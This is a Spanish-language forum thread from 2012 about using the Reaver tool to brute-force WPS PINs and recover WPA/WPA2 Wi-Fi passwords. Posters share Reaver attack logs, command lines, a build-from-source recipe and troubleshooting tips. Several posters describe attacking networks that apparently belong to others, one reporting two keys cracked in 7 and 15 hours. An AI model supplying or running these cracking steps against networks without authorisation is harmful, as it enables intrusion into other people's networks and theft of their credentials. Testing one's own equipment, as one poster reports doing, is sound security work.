REAVER: Vulnerabilidad de WPA por WPS habilitado

Iniciado por ChimoC, 15 Enero 2012, 02:25 AM

0 Miembros y 3 Visitantes están viendo este tema.

ragtap

Cita de: ChimoC en 24 Enero 2012, 09:40 AM
Buenas:

@ragtap y se_aviles: ¿Qué versión de reaver estais usando?

@heaviloto: A ver si quedamos con zydas  ;-)

Un saludete

ChimoC


Estoy utilizando la version 1.4 que viene por defecto en la WW 3.4

Añado que intentando otra red obtendo es siguiente error:
  • Trying pin 33365671
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!


E3

Ami me funciona bien dos onoYYXX WPA/WPA2 wps habilitados  por los aires, uno en 7h y el otro en 15h.... Reaver recomendado lentito pero con esta seguridad de lo mejor que hay ahora. Las dos keys 10 numeros de 0-9. Para sacar esta key con dicc vamos listos 30 años

ragtap


E3


Lenna

#34
Hola,

Soy nueva en el foro y primeramente daros la enhorabuena por la web.

Quería comentaros que he estado probando el reaver con mi propia red, la cuál tenía el WPS activado, y no hubo problemas en sacar el pass. Como dato deciros que tardó 7:15 h. Por supuesto ya desactivé el WPS =)

El problema es cuando voy a probar con otra red a ver qué ocurre. Compruebo que tiene WPS, que está activado también, y procedo con el reaver. Os paso el log:

  • Waiting for beacon from XX:XX:XX:XX:XX:XX
  • Switching mon0 to channel 9
  • Switching mon0 to channel 1
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
  • Associated with 74:44:01:60:C5:BA (ESSID: ONOXXX)
  • Trying pin 12345670
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
    (...)
  • Received identity request
  • Sending identity response
    [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 12345670
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3

    Como véis, los canales se van alternando.

    Así que tanto si pruebo a meterle un canal:
    # reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c X
    como si pruebo a fijarla:
    # reaver -i mon0 -b XX:XX:XX:XX:XX:XX --fixed
    el mensaje es, para ambos, el siguiente:

  • Waiting for beacon from XX:XX:XX:XX:XX:XX
  • Associated with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
    (...)

    Si a alguien supiese a que se debe este fallo en la asociación, agredecería que me diesen respuestas.

    Un saludo.

P4nd3m0n1um

buenas, les dejo para los que tengan ubuntu o debian que trabajan con archivos .deb, los deb de Reaver v1.4:


--> Reaver-1.4.deb


Pablo Videla

Yo he tenido varias dudas respecto a esto y jamás lo he hecho, pero ahora que esta mas "producida" la cosa, tengo las siguientes consultas:

Estas vulnerabilidades depende del router, o de la compañia de ISP ? es valido para todos los paises? porque jamas he visto esas redes aca en Chile, me gustaría que me aclararan eso, gracias.

raimangsxr

Trasteando me he dado cuenta que en W7 se puede saber si un AP tiene WPS activado simplemente pulsando conectar  :silbar:

¿O estoy equivocado? Lo digo para evitarse lo del Etherreal/Wireshark

http://imageshack.us/photo/my-images/845/sinttulowqz.png/

raimangsxr

Me pasa exactamente como a Lenna, obtengo:

[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)

Y no hay manera.

Utilizo awus036h/rtl8187L y la señal es de -30 en el airodump-ng supongo que es más que suficiente.

¿Alguna idea de porque no se asocia?

raimangsxr

Solucionado el problema de asociación que tenía.

Simplemente me descargado la ultima versión del repositorio de svn de reaver en mi ubuntu 11.04

Esto es una dependencia necesaria:
sudo apt-get install libsqlite3-dev

Descargamos la ultima versión de reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver

Lo instalamos => ./configure, make install y make

Lo utilizamos => ./reaver -i mon0 -b bssid -vv

Y ha fucionado sin problemas. Esos son los pasos que yo he seguido.

NOTA: en algun paso si os falla utilizad "sudo" para ejecutalo. No recuerdo cual era pero creo que make install fallaba y era necesario ejecutarlo como sudo make install.

Un saludo.